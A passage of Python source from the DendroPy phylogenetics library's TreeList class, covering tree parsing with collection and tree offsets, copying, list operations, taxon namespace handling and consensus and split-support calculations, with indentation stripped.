e.g., a ``tree_offset`` value of -10 means to retrieve the last 10
trees in the collection. If the tree offset index is equal or
greater than the number of trees in the collection, then IndexError
is raised. Requires that a particular tree collection has been
identified using the ``tree_collection_offset`` parameter: if
``tree_collection_offset`` is not specified, a TypeError is raised.
\*\*kwargs : keyword arguments
Arguments to customize parsing, instantiation, processing, and
accession of |Tree| objects read from the data source, including
schema- or format-specific handling.
The following optional keyword arguments are recognized and handled
by this function:
* ``label`` Specifies the label or description of the new
|TreeList|.
* ``taxon_namespace`` specifies the |TaxonNamespace|
object to be attached to the new |TreeList| object.
Note that *all* operational taxonomic unit concepts in the
data source will be accessioned into the specified
|TaxonNamespace| instance. This includes the
operation taxonomic unit definitions associated with all
tree collections and character matrices in the data source.
* ``tree_list`` : **SPECIAL** If passed a |TreeList| using
this keyword, then this instance is populated and returned
(instead of a new instance being created).
All other keyword arguments are passed directly to |TreeList|.read()`.
Other keyword arguments may be available, depending on the implementation
of the reader specialized to handle ``schema`` formats.
Notes
-----
Note that in most cases, even if ``collection_offset`` and ``tree_offset``
are specified to restrict the trees returned, the *entire* data source
is still parsed and processed. So this is not more efficient than
reading all the trees and then manually-extracting them later; just
more convenient. If you need just a single subset of trees from a data
source, there is no gain in efficiency. If you need multiple trees or
subsets of trees from the same data source, it would be much more
efficient to read the entire data source, and extract trees as needed.
Returns
-------
A |TreeList| object.
"""
# these must be pulled before passing the kwargs
# down to the reader
tree_list = kwargs.pop("tree_list", None)
taxon_namespace = taxonmodel.process_kwargs_dict_for_taxon_namespace(kwargs, None)
label = kwargs.pop("label", None)
# get the reader
reader = dataio.get_reader(schema, **kwargs)
# Accommodate an existing TreeList object being passed
if tree_list is None:
tree_list = cls(label=label, taxon_namespace=taxon_namespace)
if collection_offset is None and tree_offset is not None:
collection_offset = 0
if collection_offset is None:
# if tree_offset is not None:
# raise TypeError("Cannot specify ``tree_offset`` without specifying ``collection_offset``")
# coerce all tree products into this list
reader.read_tree_lists(
stream=stream,
taxon_namespace_factory=tree_list._taxon_namespace_pseudofactory,
tree_list_factory=tree_list._tree_list_pseudofactory,
global_annotations_target=None)
else:
tree_lists = reader.read_tree_lists(
stream=stream,
taxon_namespace_factory=tree_list._taxon_namespace_pseudofactory,
tree_list_factory=tree_list.__class__,
global_annotations_target=None)
# if collection_offset < 0:
# raise IndexError("Collection offset out of range: {} (minimum valid tree offset = 0)".format(collection_offset))
if collection_offset >= len(tree_lists):
raise IndexError("Collection offset out of range: {} (number of collections = {}, maximum valid collection offset = {})".format(collection_offset, len(tree_lists), len(tree_lists)-1))
target_tree_list = tree_lists[collection_offset]
tree_list.copy_annotations_from(target_tree_list)
if tree_offset is not None:
# if tree_offset < 0:
# raise IndexError("Tree offset out of range: {} (minimum offset = 0)".format(tree_offset))
if tree_offset >= len(target_tree_list):
raise IndexError("Tree offset out of range: {} (number of trees in source = {}, maximum valid tree offset = {})".format(tree_offset, len(target_tree_list), len(target_tree_list)-1))
for tree in target_tree_list[tree_offset:]:
tree_list._trees.append(tree)
else:
for tree in target_tree_list:
tree_list._trees.append(tree)
return tree_list
# taxon_namespace = taxonmodel.process_kwargs_dict_for_taxon_namespace(kwargs, None)
# label = kwargs.pop("label", None)
# tree_list = cls(label=label,
# taxon_namespace=taxon_namespace)
# tree_list.read(
# stream=stream,
# schema=schema,
# collection_offset=collection_offset,
# tree_offset=tree_offset,
# **kwargs)
# return tree_list
_parse_and_create_from_stream = classmethod(_parse_and_create_from_stream)
@classmethod
def get(cls, **kwargs):
"""
Instantiate and return a *new* |TreeList| object from a data source.
**Mandatory Source-Specification Keyword Argument (Exactly One Required):**
- **file** (*file*) -- File or file-like object of data opened for reading.
- **path** (*str*) -- Path to file of data.
- **url** (*str*) -- URL of data.
- **data** (*str*) -- Data given directly.
**Mandatory Schema-Specification Keyword Argument:**
- **schema** (*str*) -- Identifier of format of data given by the
"``file``", "``path``", "``data``", or "``url``" argument
specified above: ":doc:`newick </schemas/newick>`", ":doc:`nexus
</schemas/nexus>`", or ":doc:`nexml </schemas/nexml>`". See
"|Schemas|" for more details.
**Optional General Keyword Arguments:**
- **label** (*str*) -- Name or identifier to be assigned to the new
object; if not given, will be assigned the one specified in the
data source, or |None| otherwise.
- **taxon_namespace** (|TaxonNamespace|) -- The |TaxonNamespace|
instance to use to :doc:`manage the taxon names </primer/taxa>`.
If not specified, a new one will be created.
- **collection_offset** (*int*) -- 0-based index of tree block or
collection in source to be parsed. If not specified then the
first collection (offset = 0) is assumed.
- **tree_offset** (*int*) -- 0-based index of first tree within the
collection specified by ``collection_offset`` to be parsed (i.e.,
skipping the first ``tree_offset`` trees). If not
specified, then the first tree (offset = 0) is assumed (i.e., no
trees within the specified collection will be skipped). Use this
to specify, e.g. a burn-in.
- **ignore_unrecognized_keyword_arguments** (*bool*) -- If |True|,
then unsupported or unrecognized keyword arguments will not
result in an error. Default is |False|: unsupported keyword
arguments will result in an error.
**Optional Schema-Specific Keyword Arguments:**
These provide control over how the data is interpreted and
processed, and supported argument names and values depend on
the schema as specified by the value passed as the "``schema``"
argument. See "|Schemas|" for more details.
**Examples:**
::
tlst1 = dendropy.TreeList.get(
file=open('treefile.tre', 'rU'),
schema="newick")
tlst2 = dendropy.TreeList.get(
path='sometrees.nexus',
schema="nexus",
collection_offset=2,
tree_offset=100)
tlst3 = dendropy.TreeList.get(
data="((A,B),(C,D));((A,C),(B,D));",
schema="newick")
tree4 = dendropy.dendropy.TreeList.get(
url="http://api.opentreeoflife.org/v2/study/pg_1144/tree/tree2324.nex",
schema="nexus")
"""
return cls._get_from(**kwargs)
DEFAULT_TREE_TYPE = treemodel.Tree
def tree_factory(cls, *args, **kwargs):
"""
Creates and returns a |Tree| of a type that this list understands how to
manage.
Deriving classes can override this to provide for custom Tree-type
object lists. You can simple override the class-level variable
`DEFAULT_TREE_TYPE` in your derived class if the constructor signature
of the alternate tree type is the same as |Tree|.
If you want to have a TreeList *instance* that generates
custom trees (i.e., as opposed to a TreeList-ish *class* of instances),
set the ``tree_type`` attribute of the TreeList instance.
Parameters
----------
\*args : positional arguments
Passed directly to constructor of |Tree|.
\*\*kwargs : keyword arguments
Passed directly to constructor of |Tree|.
Returns
-------
A |Tree| object.
"""
tree = cls.DEFAULT_TREE_TYPE(*args, **kwargs)
return tree
tree_factory = classmethod(tree_factory)
###########################################################################
### Lifecycle and Identity
def __init__(self, *args, **kwargs):
"""
Constructs a new |TreeList| object, populating it with any iterable
container with Tree object members passed as unnamed argument, or from
a data source if ``stream`` and ``schema`` are passed.
If passed an iterable container, the objects in that container must be
of type |Tree| (or derived). If the container is of type |TreeList|,
then, because each |Tree| object must have the same |TaxonNamespace|
reference as the containing |TreeList|, the trees in the container
passed as an initialization argument will be **deep**-copied (except
for associated |TaxonNamespace| and |Taxon| objects, which will
be shallow-copied). If the container is any other type of
iterable, then the |Tree| objects will be **shallow**-copied.
|TreeList| objects can directly thus be instantiated in the
following ways::
# /usr/bin/env python
from dendropy import TaxonNamespace, Tree, TreeList
# instantiate an empty tree
tlst1 = TreeList()
# TreeList objects can be instantiated from an external data source
# using the 'get()' factory class method
tlst2 = TreeList.get(file=open('treefile.tre', 'rU'), schema="newick")
tlst3 = TreeList.get(path='sometrees.nexus', schema="nexus")
tlst4 = TreeList.get(data="((A,B),(C,D));((A,C),(B,D));", schema="newick")
# can also call `read()` on a TreeList object; each read adds
# (appends) the tree(s) found to the TreeList
tlst5 = TreeList()
tlst5.read(file=open('boot1.tre', 'rU'), schema="newick")
tlst5.read(path="boot3.tre", schema="newick")
tlst5.read(value="((A,B),(C,D));((A,C),(B,D));", schema="newick")
# populated from list of Tree objects
tlist6_1 = Tree.get(
data="((A,B),(C,D))",
schema="newick")
tlist6_2 = Tree.get(
data="((A,C),(B,D))",
schema="newick")
tlist6 = TreeList([tlist5_1, tlist5_2])
# passing keywords to underlying tree parser
tlst8 = TreeList.get(
data="((A,B),(C,D));((A,C),(B,D));",
schema="newick",
taxon_namespace=tlst3.taxon_namespace,
rooting="force-rooted",
extract_comment_metadata=True,
store_tree_weights=False,
preserve_underscores=True)
# Subsets of trees can be read. Note that in most cases, the entire
# data source is parsed, so this is not more efficient than reading
# all the trees and then manually-extracting them later; just more
# convenient
# skip the *first* 100 trees in the *first* (offset=0) collection of trees
trees = TreeList.get(
path="mcmc.tre",
schema="newick",
collection_offset=0,
tree_offset=100)
# get the *last* 10 trees in the *second* (offset=1) collection of trees
trees = TreeList.get(
path="mcmc.tre",
schema="newick",
collection_offset=1,
tree_offset=-10)
# get the last 10 trees in the second-to-last collection of trees
trees = TreeList.get(
path="mcmc.tre",
schema="newick",
collection_offset=-2,
tree_offset=100)
# Slices give shallow-copy: trees are references
tlst4copy0a = t4[:]
assert tlst4copy0a[0] is t4[0]
tlst4copy0b = t4[:4]
assert tlst4copy0b[0] is t4[0]
# 'Taxon-namespace-scoped' copy:
# I.e., Deep-copied objects but taxa and taxon namespace
# are copied as references
tlst4copy1a = TreeList(t4)
tlst4copy1b = TreeList([Tree(t) for t in tlst5])
assert tlst4copy1a[0] is not tlst4[0] # True
assert tlst4copy1a.taxon_namespace is tlst4.taxon_namespace # True
assert tlst4copy1b[0] is not tlst4[0] # True
assert tlst4copy1b.taxon_namespace is tlst4.taxon_namespace # True
"""
if len(args) > 1:
# only allow 1 positional argument
raise error.TooManyArgumentsError(func_name=self.__class__.__name__, max_args=1, args=args)
elif len(args) == 1 and isinstance(args[0], TreeList):
self._clone_from(args[0], kwargs)
else:
basemodel.DataObject.__init__(self, label=kwargs.pop("label", None))
taxonmodel.TaxonNamespaceAssociated.__init__(self,
taxon_namespace=taxonmodel.process_kwargs_dict_for_taxon_namespace(kwargs, None))
self.tree_type = kwargs.pop("tree_type", self.__class__.DEFAULT_TREE_TYPE)
self._trees = []
self.comments = []
if len(args) == 1:
for aidx, a in enumerate(args[0]):
if not isinstance(a, self.tree_type):
raise ValueError("Cannot add object not of 'Tree' type to 'TreeList'")
self.append(a)
if kwargs:
raise TypeError("Unrecognized or unsupported arguments: {}".format(kwargs))
def __hash__(self):
return id(self)
def __eq__(self, other):
return (
isinstance(other, TreeList)
and (self.taxon_namespace is other.taxon_namespace)
and (self._trees == other._trees)
)
def _clone_from(self, tree_list, kwargs_dict):
memo = {}
# memo[id(tree)] = self
taxon_namespace = taxonmodel.process_kwargs_dict_for_taxon_namespace(kwargs_dict, tree_list.taxon_namespace)
memo[id(tree_list.taxon_namespace)] = taxon_namespace
if taxon_namespace is not tree_list.taxon_namespace:
for t1 in tree_list.taxon_namespace:
t2 = taxon_namespace.require_taxon(label=t1.label)
memo[id(t1)] = t2
else:
for t1 in tree_list.taxon_namespace:
memo[id(t1)] = t1
t = copy.deepcopy(tree_list, memo)
self.__dict__ = t.__dict__
self.label = kwargs_dict.pop("label", tree_list.label)
return self
def __copy__(self):
other = TreeList(label=self.label, taxon_namespace=self.taxon_namespace)
other._trees = list(self._trees)
memo = {}
memo[id(self)] = other
other.deep_copy_annotations_from(self, memo)
return other
def taxon_namespace_scoped_copy(self, memo=None):
if memo is None:
memo = {}
# this populates ``memo`` with references to the
# the TaxonNamespace and Taxon objects
self.taxon_namespace.populate_memo_for_taxon_namespace_scoped_copy(memo)
return self.__deepcopy__(memo=memo)
def __deepcopy__(self, memo=None):
return basemodel.Annotable.__deepcopy__(self, memo=memo)
###########################################################################
### Representation
def __str__(self):
return "<TreeList {} '{}': [{}]>".format(hex(id(self)), self.label, ", ".join(repr(i) for i in self._trees))
###########################################################################
### Data I/O
def _taxon_namespace_pseudofactory(self, **kwargs):
"""
Dummy factory to coerce all |TaxonNamespace| objects required when
parsing a data source to reference ``self.taxon_namespace``.
"""
if "label" in kwargs and kwargs["label"] is not None and self.taxon_namespace.label is None:
self.taxon_namespace.label = kwargs["label"]
return self.taxon_namespace
def _tree_list_pseudofactory(self, **kwargs):
"""
Dummy factory to coerce all |TreeList| objects required when
parsing a data source to reference ``self``.
"""
if "label" in kwargs and kwargs["label"] is not None and self.label is None:
self.label = kwargs["label"]
return self
def _parse_and_add_from_stream(self,
stream,
schema,
collection_offset=None,
tree_offset=None,
**kwargs):
"""
Parses |Tree| objects from data source and adds to this collection.
Notes
-----
*All* operational taxonomic unit concepts in the data source will be included
in the |TaxonNamespace| object associated with the new
|TreeList| object and its contained |Tree| objects, even those
not associated with trees or the particular trees being retrieved.
Parameters
----------
stream : file or file-like object
Source of data.
schema : string
Identifier of format of data in ``stream``.
collection_offset : integer or None
0-based index indicating collection of trees to parse. If |None|,
then all tree collections are retrieved, with each distinct
collection parsed into a separate |TreeList| object. If the
tree colleciton offset index is equal or greater than the number of
tree collections in the data source, then IndexError is raised.
Negative offsets work like negative list indexes; e.g., a
``collection_offset`` of -1 means to read the last collection of
trees in the data source. For data formats that do not support the
concept of distinct tree collections (e.g. NEWICK) are considered
single-collection data source (i.e, the only acceptable
``collection_offset`` values are -1 or 0).
tree_offset : integer or None
0-based index indicating particular tree within a particular
collection of trees at which to begin reading. If not specified or
|None| (default), then all trees are parsed. Otherwise, must be an
integer value up the length of the collection minus 1. A positive
offset indicates the number of trees in the collection to skip;
e.g. a ``tree_offset`` of 20 means to skip the first 20 trees in the
collection. Negative offsets work like negative list indexes;
e.g., a ``tree_offset`` value of -10 means to retrieve the last 10
trees in the collection. If the tree offset index is equal or
greater than the number of trees in the collection, then IndexError
is raised. Requires that a particular tree collection has been
identified using the ``tree_collection_offset`` parameter: if
``tree_collection_offset`` is not specified, a TypeError is raised.
\*\*kwargs : keyword arguments
Arguments to customize parsing, instantiation, processing, and
accession of |Tree| objects read from the data source, including
schema- or format-specific handling. These will be passed to the
underlying schema-specific reader for handling.
General (schema-agnostic) keyword arguments are:
* ``rooted`` specifies the default rooting interpretation of the tree.
* ``edge_length_type`` specifies the type of the edge lengths (int or
float; defaults to 'float')
Other keyword arguments are available depending on the schema. See
specific schema handlers (e.g., `NewickReader`, `NexusReader`,
`NexmlReader`) for more details.
Notes
-----
Note that in most cases, even if ``collection_offset`` and ``tree_offset``
are specified to restrict the trees read, the *entire* data source
is still parsed and processed. So this is not more efficient than
reading all the trees and then manually-extracting them later; just
more convenient. If you need just a single subset of trees from a data
source, there is no gain in efficiency. If you need multiple trees or
subsets of trees from the same data source, it would be much more
efficient to read the entire data source, and extract trees as needed.
Returns
-------
n : ``int``
The number of |Tree| objects read.
"""
if "taxon_namespace" in kwargs and kwargs['taxon_namespace'] is not self.taxon_namespace:
raise TypeError("Cannot change ``taxon_namespace`` when reading into an existing TreeList")
kwargs["taxon_namespace"] = self.taxon_namespace
kwargs["tree_list"] = self
cur_size = len(self._trees)
TreeList._parse_and_create_from_stream(
stream=stream,
schema=schema,
collection_offset=collection_offset,
tree_offset=tree_offset,
**kwargs)
new_size = len(self._trees)
return new_size - cur_size
def read(self, **kwargs):
"""
Add |Tree| objects to existing |TreeList| from data source providing
one or more collections of trees.
**Mandatory Source-Specification Keyword Argument (Exactly One Required):**
- **file** (*file*) -- File or file-like object of data opened for reading.
- **path** (*str*) -- Path to file of data.
- **url** (*str*) -- URL of data.
- **data** (*str*) -- Data given directly.
**Mandatory Schema-Specification Keyword Argument:**
- **schema** (*str*) -- Identifier of format of data given by the
"``file``", "``path``", "``data``", or "``url``" argument
specified above: ":doc:`newick </schemas/newick>`", ":doc:`nexus
</schemas/nexus>`", or ":doc:`nexml </schemas/nexml>`". See
"|Schemas|" for more details.
**Optional General Keyword Arguments:**
- **collection_offset** (*int*) -- 0-based index of tree block or
collection in source to be parsed. If not specified then the
first collection (offset = 0) is assumed.
- **tree_offset** (*int*) -- 0-based index of first tree within the
collection specified by ``collection_offset`` to be parsed (i.e.,
skipping the first ``tree_offset`` trees). If not
specified, then the first tree (offset = 0) is assumed (i.e., no
trees within the specified collection will be skipped). Use this
to specify, e.g. a burn-in.
- **ignore_unrecognized_keyword_arguments** (*bool*) -- If |True|,
then unsupported or unrecognized keyword arguments will not
result in an error. Default is |False|: unsupported keyword
arguments will result in an error.
**Optional Schema-Specific Keyword Arguments:**
These provide control over how the data is interpreted and
processed, and supported argument names and values depend on
the schema as specified by the value passed as the "``schema``"
argument. See "|Schemas|" for more details.
**Examples:**
::
tlist = dendropy.TreeList()
tlist.read(
file=open('treefile.tre', 'rU'),
schema="newick",
tree_offset=100)
tlist.read(
path='sometrees.nexus',
schema="nexus",
collection_offset=2,
tree_offset=100)
tlist.read(
data="((A,B),(C,D));((A,C),(B,D));",
schema="newick")
tlist.read(
url="http://api.opentreeoflife.org/v2/study/pg_1144/tree/tree2324.nex",
schema="nexus")
"""
return basemodel.MultiReadable._read_from(self, **kwargs)
def _format_and_write_to_stream(self, stream, schema, **kwargs):
"""
Writes out ``self`` in ``schema`` format to a destination given by
file-like object ``stream``.
Parameters
----------
stream : file or file-like object
Destination for data.
schema : string
Must be a recognized and tree file schema, such as "nexus",
"newick", etc, for which a specialized tree list writer is
available. If this is not implemented for the schema specified, then
a UnsupportedSchemaError is raised.
\*\*kwargs : keyword arguments, optional
Keyword arguments will be passed directly to the writer for the
specified schema. See documentation for details on keyword
arguments supported by writers of various schemas.
"""
writer = dataio.get_writer(schema, **kwargs)
writer.write_tree_list(self, stream)
###########################################################################
### List Interface
def _import_tree_to_taxon_namespace(self,
tree,
taxon_import_strategy="migrate",
**kwargs):
if tree.taxon_namespace is not self.taxon_namespace:
if taxon_import_strategy == "migrate":
tree.migrate_taxon_namespace(taxon_namespace=self.taxon_namespace,
**kwargs)
elif taxon_import_strategy == "add":
tree._taxon_namespace = self.taxon_namespace
tree.update_taxon_namespace()
else:
raise ValueError("Unrecognized taxon import strategy: '{}'".format(taxon_import_strategy))
# assert tree.taxon_namespace is self.taxon_namespace
return tree
def insert(self,
index,
tree,
taxon_import_strategy="migrate",
**kwargs):
"""
Inserts a |Tree| object, ``tree``, into the collection before
``index``.
The |TaxonNamespace| reference of ``tree`` will be set to that of
``self``. Any |Taxon| objects associated with nodes in ``tree``
that are not already in ``self.taxon_namespace`` will be handled
according to ``taxon_import_strategy``:
- 'migrate'
|Taxon| objects associated with ``tree`` that are not already
in ``self.taxon_nameaspace`` will be remapped based on their
labels, with new :class|Taxon| objects being reconstructed if
none with matching labels are found. Specifically,
:meth:`dendropy.datamodel.treemodel.Tree.migrate_taxon_namespace()`
will be called on ``tree``, where ``kwargs`` is as passed to
this function.
- 'add'
|Taxon| objects associated with ``tree`` that are not already
in ``self.taxon_namespace`` will be added. Note that this might
result in |Taxon| objects with duplicate labels as no
attempt at mapping to existing |Taxon| objects based on
label-matching is done.
Parameters
----------
index : integer
Position before which to insert ``tree``.
tree : A |Tree| instance
The |Tree| object to be added.
taxon_import_strategy : string
If ``tree`` is associated with a different |TaxonNamespace|,
this argument determines how new |Taxon| objects in ``tree``
are handled: 'migrate' or 'add'. See above for details.
\*\*kwargs : keyword arguments
These arguments will be passed directly to
'migrate_taxon_namespace()' method call on ``tree``.
See Also
--------
:meth:`Tree.migrate_taxon_namespace`
"""
self._import_tree_to_taxon_namespace(
tree=tree,
taxon_import_strategy=taxon_import_strategy,
**kwargs)
self._trees.insert(index, tree)
def append(self,
tree,
taxon_import_strategy="migrate",
**kwargs):
"""
Adds a |Tree| object, ``tree``, to the collection.
The |TaxonNamespace| reference of ``tree`` will be set to that of
``self``. Any |Taxon| objects associated with nodes in ``tree``
that are not already in ``self.taxon_namespace`` will be handled
according to ``taxon_import_strategy``:
- 'migrate'
|Taxon| objects associated with ``tree`` that are not already
in ``self.taxon_nameaspace`` will be remapped based on their
labels, with new :class|Taxon| objects being reconstructed if
none with matching labels are found. Specifically,
:meth:`dendropy.datamodel.treemodel.Tree.migrate_taxon_namespace()`
will be called on ``tree``, where ``kwargs`` is as passed to this
function.
- 'add'
|Taxon| objects associated with ``tree`` that are not already
in ``self.taxon_namespace`` will be added. Note that this might
result in |Taxon| objects with duplicate labels as no
attempt at mapping to existing |Taxon| objects based on
label-matching is done.
Parameters
----------
tree : A |Tree| instance
The |Tree| object to be added.
taxon_import_strategy : string
If ``tree`` is associated with a different |TaxonNamespace|,
this argument determines how new |Taxon| objects in ``tree``
are handled: 'migrate' or 'add'. See above for details.
\*\*kwargs : keyword arguments
These arguments will be passed directly to
'migrate_taxon_namespace()' method call on ``tree``.
See Also
--------
:meth:`Tree.migrate_taxon_namespace`
"""
self._import_tree_to_taxon_namespace(
tree=tree,
taxon_import_strategy=taxon_import_strategy,
**kwargs)
self._trees.append(tree)
def extend(self, other):
"""
In-place addition of |Tree| objects in ``other`` to ``self``.
If ``other`` is a |TreeList|, then the trees are *copied*
and migrated into ``self.taxon_namespace``; otherwise, the original
objects are migrated into ``self.taxon_namespace`` and added directly.
Parameters
----------
other : iterable of |Tree| objects
Returns
-------
``self`` : |TreeList|
"""
if isinstance(other, TreeList):
for t0 in other:
t1 = self.tree_type(t0, taxon_namespace=self.taxon_namespace)
self._trees.append(t1)
else:
for t0 in other:
self.append(t0)
return self
def __iadd__(self, other):
"""
In-place addition of |Tree| objects in ``other`` to ``self``.
If ``other`` is a |TreeList|, then the trees are *copied*
and migrated into ``self.taxon_namespace``; otherwise, the original
objects are migrated into ``self.taxon_namespace`` and added directly.
Parameters
----------
other : iterable of |Tree| objects
Returns
-------
``self`` : |TreeList|
"""
return self.extend(other)
def __add__(self, other):
"""
Creates and returns new |TreeList| with clones of all trees in ``self``
as well as all |Tree| objects in ``other``. If ``other`` is a
|TreeList|, then the trees are *cloned* and migrated into
``self.taxon_namespace``; otherwise, the original objects are migrated into
``self.taxon_namespace`` and added directly.
Parameters
----------
other : iterable of |Tree| objects
Returns
-------
tlist : |TreeList| object
|TreeList| object containing clones of |Tree| objects
in ``self`` and ``other``.
"""
tlist = TreeList(taxon_namespace=self.taxon_namespace)
tlist += self
tlist += other
return tlist
def __contains__(self, tree):
return tree in self._trees
def __delitem__(self, tree):
del self._trees[tree]
def __iter__(self):
return iter(self._trees)
def __reversed__(self):
return reversed(self._trees)
def __len__(self):
return len(self._trees)
def __getitem__(self, index):
"""
If ``index`` is an integer, then |Tree| object at position ``index``
is returned. If ``index`` is a slice, then a |TreeList| is returned
with references (i.e., not copies or clones, but the actual original
instances themselves) to |Tree| objects in the positions given
by the slice. The |TaxonNamespace| is the same as ``self``.
Parameters
----------
index : integer or slice
Index or slice.
Returns
-------
t : |Tree| object or |TreeList| object
"""
if isinstance(index, slice):
r = self._trees[index]
return TreeList(r,
taxon_namespace=self.taxon_namespace)
else:
return self._trees[index]
def __setitem__(self, index, value):
if isinstance(index, slice):
if isinstance(value, TreeList):
tt = []
for t0 in value:
t1 = self.tree_type(t0,
taxon_namespace=self.taxon_namespace)
tt.append(t1)
value = tt
else:
for t in value:
self._import_tree_to_taxon_namespace(t)
self._trees[index] = value
else:
self._trees[index] = self._import_tree_to_taxon_namespace(value)
def clear(self):
# list.clear() only with 3.4 or so ...
self._trees = []
def index(self, tree):
return self._trees.index(tree)
def pop(self, index=-1):
return self._trees.pop(index)
def remove(self, tree):
self._trees.remove(tree)
def reverse(self):
self._trees.reverse()
def sort(self, key=None, reverse=False):
self._trees.sort(key=key, reverse=reverse)
def new_tree(self, *args, **kwargs):
tns = taxonmodel.process_kwargs_dict_for_taxon_namespace(kwargs, self.taxon_namespace)
if tns is not self.taxon_namespace:
raise TypeError("Cannot create new Tree with different TaxonNamespace")
kwargs["taxon_namespace"] = self.taxon_namespace
if self.tree_type is not None:
tree = self.tree_type(*args, **kwargs)
else:
tree = self.tree_factory(*args, **kwargs)
self._trees.append(tree)
return tree
##############################################################################
## Taxon Handling
def reconstruct_taxon_namespace(self,
unify_taxa_by_label=True,
taxon_mapping_memo=None):
if taxon_mapping_memo is None:
taxon_mapping_memo = {}
for tree in self._trees:
tree._taxon_namespace = self.taxon_namespace
tree.reconstruct_taxon_namespace(
unify_taxa_by_label=unify_taxa_by_label,
taxon_mapping_memo=taxon_mapping_memo,
)
def update_taxon_namespace(self):
for tree in self._trees:
tree._taxon_namespace = self.taxon_namespace
tree.update_taxon_namespace()
def poll_taxa(self, taxa=None):
"""
Returns a set populated with all of |Taxon| instances associated
with ``self``.
Parameters
----------
taxa : set()
Set to populate. If not specified, a new one will be created.
Returns
-------
taxa : set[|Taxon|]
Set of taxa associated with ``self``.
"""
if taxa is None:
taxa = set()
for tree in self:
tree.poll_taxa(taxa)
return taxa
def reindex_subcomponent_taxa():
raise NotImplementedError()
##############################################################################
## Special Calculations and Operations on Entire Collection
def _get_tree_array(self,
kwargs_dict,
):
"""
Return TreeArray containing information of trees currently
in self. Processes ``kwargs_dict`` intelligently: removing
and passing on keyword arguments pertaining to TreeArray
construction, and leaving everything else.
"""
# TODO: maybe ignore_node_ages defaults to |False| but ``ultrametricity_precision`` defaults to 0?
ta = TreeArray.from_tree_list(
trees=self,
# taxon_namespace=self.taxon_namespace,
is_rooted_trees=kwargs_dict.pop("is_rooted_trees", None),
ignore_edge_lengths=kwargs_dict.pop("ignore_edge_lengths", False),
ignore_node_ages=kwargs_dict.pop("ignore_node_ages", True),
use_tree_weights=kwargs_dict.pop("use_tree_weights", True),
ultrametricity_precision=kwargs_dict.pop("ultrametricity_precision", constants.DEFAULT_ULTRAMETRICITY_PRECISION),
is_force_max_age=kwargs_dict.pop("is_force_max_age", None),
taxon_label_age_map=kwargs_dict.pop("taxon_label_age_map", None),
is_bipartitions_updated=kwargs_dict.pop("is_bipartitions_updated", False)
)
return ta
def split_distribution(self,
is_bipartitions_updated=False,
default_edge_length_value=None,
**kwargs):
"""
Return `SplitDistribution` collecting information on splits in
contained trees. Keyword arguments get passed directly to
`SplitDistribution` constructor.
"""
assert "taxon_namespace" not in kwargs or kwargs["taxon_namespace"] is self.taxon_namespace
kwargs["taxon_namespace"] = self.taxon_namespace
sd = SplitDistribution(**kwargs)
for tree in self:
sd.count_splits_on_tree(
tree=tree,
is_bipartitions_updated=is_bipartitions_updated,
default_edge_length_value=default_edge_length_value)
return sd
def as_tree_array(self, **kwargs):
"""
Return |TreeArray| collecting information on splits in contained
trees. Keyword arguments get passed directly to |TreeArray|
constructor.
"""
ta = TreeArray.from_tree_list(
trees=self,
**kwargs)
return ta
def consensus(self,
min_freq=constants.GREATER_THAN_HALF,
is_bipartitions_updated=False,
summarize_splits=True,
**kwargs):
"""
Returns a consensus tree of all trees in self, with minumum frequency
of bipartition to be added to the consensus tree given by ``min_freq``.
"""
ta = self._get_tree_array(kwargs)
return ta.consensus_tree(min_freq=min_freq,
summarize_splits=summarize_splits,
**kwargs)
def maximum_product_of_split_support_tree(
self,
include_external_splits=False,
score_attr="log_product_of_split_support"):
"""
Return the tree with that maximizes the product of split supports, also
known as the "Maximum Clade Credibility Tree" or MCCT.
Parameters
----------
include_external_splits : bool
If |True|, then non-internal split posteriors will be included in
the score. Defaults to |False|: these are skipped. This should only
make a difference when dealing with splits collected from trees of
different leaf sets.
Returns
-------
mcct_tree : Tree
Tree that maximizes the product of split supports.
"""
ta = self._get_tree_array({})
scores, max_score_tree_idx = ta.calculate_log_product_of_split_supports(
include_external_splits=include_external_splits,
)
tree = self[max_score_tree_idx]
if score_attr is not None:
setattr(tree, score_attr, scores[max_score_tree_idx])
return tree
def maximum_sum_of_split_support_tree(
self,
include_external_splits=False,
score_attr="sum_of_split_support"):
"""
Return the tree with that maximizes the *sum* of split supports.
Parameters
----------
include_external_splits : bool
If |True|, then non-internal split posteriors will be included in
the score. Defaults to |False|: these are skipped. This should only
make a difference when dealing with splits collected from trees of
different leaf sets.
Returns
-------
mcct_tree : Tree
Tree that maximizes the sum of split supports.
"""
ta = self._get_tree_array({})
scores, max_score_tree_idx = ta.calculate_sum_of_split_supports(
include_external_splits=include_external_splits,
)
tree = self[max_score_tree_idx]
if score_attr is not None:
setattr(tree, score_attr, scores[max_score_tree_idx])
return tree
def frequency_of_bipartition(self, **kwargs):
"""
Given a bipartition specified as:
- a |Bipartition| instance given the keyword 'bipartition'
- a split bitmask given the keyword 'split_bitmask'
- a list of |Taxon| objects given with the keyword ``taxa``
- a list of taxon labels given with the keyword ``labels``
this function returns the proportion of trees in self
in which the split is found.
If the tree(s) in the collection are unrooted, then the bipartition
will be normalized for the comparison.
"""
split = None
is_bipartitions_updated = kwargs.pop("is_bipartitions_updated", False)
if "split_bitmask" in kwargs:
split = kwargs["split_bitmask"]
elif "bipartition" in kwargs:
split = kwargs["bipartition"].split_bitmask
elif "taxa" in kwargs or "labels" in kwargs:
split = self.taxon_namespace.taxa_bitmask(**kwargs)
if "taxa" in kwargs:
k = len(kwargs["taxa"])
else:
k = len(kwargs["labels"])
if bitprocessing.num_set_bits(split) != k:
raise IndexError('Not all taxa could be mapped to bipartition (%s): %s' \
% (self.taxon_namespace.bitmask_as_bitstring(split), k))
else:
raise TypeError("Need to specify one of the following keyword arguments: 'split_bitmask', 'bipartition', 'taxa', or 'labels'")
unnormalized_split = split
normalized_split = treemodel.Bipartition.normalize_bitmask(
bitmask=split,
fill_bitmask=self.taxon_namespace.all_taxa_bitmask(),
lowest_relevant_bit=1)
found = 0
total = 0
for tree in self:
if not is_bipartitions_updated or not tree.bipartition_encoding:
tree.encode_bipartitions()
bipartition_encoding = set(b.split_bitmask for b in tree.bipartition_encoding)
total += 1
if tree.is_unrooted and (normalized_split in bipartition_encoding):
found += 1
elif (not tree.is_unrooted) and (unnormalized_split in bipartition_encoding):
found += 1
try:
return float(found)/total
except ZeroDivisionError:
return 0
def frequency_of_split(self, **kwargs):
"""
DEPRECATED: use 'frequency_of_bipartition()' instead.
"""
deprecate.dendropy_deprecation_warning(
message="Deprecated since DendroPy 4: Instead of 'frequency_of_split()' use 'frequency_of_bipartition()'",
stacklevel=4,
)
return self.frequency_of_bipartition(**kwargs)
###############################################################################
### SplitDistribution
